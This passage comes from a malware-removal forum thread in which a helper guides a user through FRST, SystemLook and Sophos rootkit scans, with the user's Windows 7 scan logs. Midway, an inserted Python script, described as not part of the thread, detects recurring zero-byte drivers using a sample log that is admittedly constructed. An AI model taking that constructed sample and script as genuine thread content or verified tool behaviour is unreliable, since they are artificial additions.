2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:11 - 2018-03-20 17:01 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:14 - 2018-03-20 17:00 - 001661758 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000159712 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000142816 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 018910384 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 012966032 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 011000288 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2018-02-26 15:17 - 2018-02-25 06:34 - 003918512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2018-02-26 15:17 - 2018-02-24 13:46 - 000000669 _____ C:\Windows\system32\nv-vk64.json
2018-02-26 14:45 - 2017-12-15 03:03 - 000059240 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2018-02-23 15:09 - 2018-02-23 15:09 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Piece of Cake studios

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-20 17:01 - 2013-10-17 21:32 - 000000000 ____D C:\Users\Martin
2018-03-20 17:01 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-20 16:54 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-20 16:54 - 2009-07-14 05:45 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-19 20:07 - 2013-11-14 20:32 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA Corporation
2018-03-19 20:07 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-19 16:51 - 2014-10-08 23:05 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Temp
2018-03-19 16:50 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

Some files in TEMP:
====================
2018-03-19 19:58 - 2018-01-12 17:33 - 001665384 _____ (Microsoft Corporation) C:\Users\Martin\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe
[2018-01-05 13:05] - [2018-01-01 02:50] - 000455680 _____ (Microsoft Corporation) 11D6A262B617130F7C16E308C12E0D41

C:\Windows\system32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\system32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\system32\services.exe => MD5 is legit
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\system32\rpcss.dll
[2018-01-05 13:05] - [2018-01-01 03:18] - 000512000 _____ (Microsoft Corporation) BA6C9EE518A11DA4AD061B223EBED3D3

C:\Windows\system32\dnsapi.dll => MD5 is legit
C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
C:\Windows\system32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================



#8 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 20 March 2018 - 01:16 PM

Hi,
Download the SystemLook appropriate for your system.

SystemLook (32-Bit Version) or SystemLook (64-Bit Version)

  • Double-click SystemLook.exe/SystemLook_x64.exe to run it.
  • Copy and paste the content of the following bold text into the main textfield:
    :reg
    HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
  • Note: The log can also be found on your Desktop entitled SystemLook.txt.

===

If the SystemLook.txt file is too long to post, attach it.


Edited by nasdaq, 20 March 2018 - 01:18 PM.


#9 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts

Posted 20 March 2018 - 02:17 PM

SystemLook 04.09.10 by jpshortstuff
Log created at 20:11 on 20/03/2018 by Martin
Administrator - Elevation successful

========== reg ==========

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run]
(No values found)


-= EOF =-



#10 nasdaq

nasdaq

  • Malware Response Team
  • 40,454 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:01:09 PM

Posted 21 March 2018 - 07:34 AM



Hi,

Each time we delete the Zero byte driver it is recreated. It could be caused by a rootkit infection.

Download and run the Sophos Rootkit removal.
https://www.sophos.com/en-us/products/free-tools/sophos-anti-rootkit.aspx

===

When completed, and after a restart of the computer, delete the copy of the Farbar program.

Download and run the new version. Post the logs for my review.
Download the version of this tool for your operating system.
Farbar Recovery Scan Tool (64 bit)
Farbar Recovery Scan Tool (32 bit)
and save it to a folder on your computer's Desktop.
Double-click to run it. When the tool opens click Yes to disclaimer.
Press Scan button.
It will make a log (FRST.txt) in the same directory the tool is run from. Please copy and paste it to your reply.
The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.

How to attach a file to your reply:
In the Reply section at the bottom of the topic, click the "more reply Options" button.

Attach the file.
Select "Choose a File" and navigate to the location of the file.
Click the file you wish to attach.
Click Attach this file.
Click the Add reply button.
===


Please post the logs for my review.

Let me know what problem persists.
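
The recurring zero-byte driver described in the post above appears in FRST's Drivers section as an entry with a size of 0 and no file date. As an added example (not part of the thread and not FRST's own code), this Python script parses that line format and compares two scans to flag a zero-byte driver that comes back under a new name. The "before" sample is constructed: only its driver name is taken from the thread title, and the function names are assumptions.

```python
import re
from dataclasses import dataclass
from ntpath import dirname  # handles Windows paths on any OS

# FRST service/driver entry:
#   <state><start> <name>; <path> [<size> <date>] (<company>) <optional flags>
# Zero-byte files are printed as "[0 ]" with no date.
ENTRY_RE = re.compile(
    r'^(?P<state>[RSU])(?P<start>[0-5])\s+(?P<name>[^;]+);\s+'
    r'(?P<path>.+?)\s+\[(?P<size>\d+)\s*(?P<date>\d{4}-\d{2}-\d{2})?\s*\]'
    r'\s*\((?P<company>[^)]*)\)'
)


@dataclass(frozen=True)
class Entry:
    state: str    # R = running, S = stopped, U = undetermined
    start: int    # service start type, 0 (boot) to 4 (disabled)
    name: str     # service key name
    path: str     # image path on disk
    size: int     # file size in bytes as reported by the scan
    company: str  # company string from the file, may be empty


def parse_entries(log_text):
    """Return every service/driver entry that carries a [size date] field.
    Lines in other formats (headers, raw command lines) are skipped."""
    entries = []
    for line in log_text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append(Entry(m['state'], int(m['start']), m['name'].strip(),
                                 m['path'], int(m['size']), m['company'].strip()))
    return entries


def zero_byte_drivers(entries):
    """Driver entries whose .sys file exists but is empty."""
    return [e for e in entries
            if e.size == 0 and e.path.lower().endswith('.sys')]


def respawned(before_log, after_log):
    """Zero-byte drivers in the later scan that have a new service name but
    sit in a directory where the earlier scan already had a zero-byte driver.
    That is the delete-and-reappear pattern: removing one entry is not
    enough because something still running recreates it."""
    old = zero_byte_drivers(parse_entries(before_log))
    old_names = {e.name.lower() for e in old}
    old_dirs = {dirname(e.path).lower() for e in old}
    return [e for e in zero_byte_drivers(parse_entries(after_log))
            if e.name.lower() not in old_names
            and dirname(e.path).lower() in old_dirs]


# Constructed sample of an earlier scan (driver name from the thread title,
# remaining fields assumed).
SCAN_BEFORE = r"""
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
U3 esvhnqcv; C:\Windows\System32\Drivers\esvhnqcv.sys [0 ] () <==== ATTENTION (zero byte File/Folder)
"""

# Lines in the format of the later scan posted in this thread.
SCAN_AFTER = r"""
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
U3 a48h1yy9; C:\Windows\System32\Drivers\a48h1yy9.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)
"""

if __name__ == "__main__":
    for e in respawned(SCAN_BEFORE, SCAN_AFTER):
        print(f"recreated zero-byte driver: {e.name} -> {e.path}")
```
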

#11 mortn

mortn
  • Topic Starter

  • Members
  • 16 posts

Posted 22 March 2018 - 01:00 AM

Hello!

At first, I could not install Sophos Rootkit removal. I got a prompt saying that Windows installer service was unable. However, I did manage to install it after enabling that service in the msconfig. When starting the program, I got a prompt saying it might not be up to date, since it couldn't update due to no network connection. After running the scan, it found and deleted 5 items.

Here is the FRST-log. The Addition-log is attached as you requested.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (22-03-2018 06:55:44)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-19]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
